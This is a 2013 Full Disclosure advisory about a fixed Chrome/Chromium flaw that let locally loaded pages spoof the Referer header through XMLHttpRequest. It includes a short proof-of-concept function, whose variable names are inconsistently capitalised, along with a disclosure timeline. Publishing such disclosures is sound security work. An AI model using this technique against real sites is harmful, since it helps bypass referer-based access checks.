Full Disclosure mailing list archives
Advisory: XMLHttpRequest HTTP Referer Header Faking
From: LIAD Mizrachi <liadmz () gmail com>
Date: Sun, 7 Jul 2013 14:02:35 +0300
Advisory: XMLHttpRequest HTTP Referer Header Faking Author: Liad Mizrachi Vendor URL: http://www.chromium.org/ Vulnerability Status: Fixed Application Version: Google Chrome v25.0.1364.152 ========================== Vulnerability Description ========================== Chromium is the open source web browser project from which Google Chrome draws its source code. Chromium fails to validate the use of unsafe headers when the page is load from the local drive, allowing to set and change the referer header using "setRequestHeader" when generating a Ajax (XMLHttpRequest) request. ========================== PoC ========================== function SendReq() { var xmlhttp = new XmlHttpRequest(); xmlHttp.onreadystatechange = readyStateChanged; xmlHttp.open("GET", "http://AnySite.com/checkReferer.php", true); xmlHttp.setRequestHeader("Referer", "http://valid.referer.com"); xmlHttp.send(); } ========================== Solution ========================== Block all scripts from setting unsafe headers in XMLHttpRequest. - Fixed by vendor. ========================== Disclosure Timeline ========================== 04-Mar-2013 - Google Security Team informed by mail. 14-Mar-2013 - Google Security Team Reply: "Since ChromeOS is an open source project, please file the report directly in their bug tracker" 14-Mar-2013 - Security Bug Opened @ Chromium project. 30-Apr-2013 - Fixed. ========================== References ========================== http://www.chromium.org/ https://codereview.chromium.org/13979011/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Advisory: XMLHttpRequest HTTP Referer Header Faking LIAD Mizrachi (Jul 08)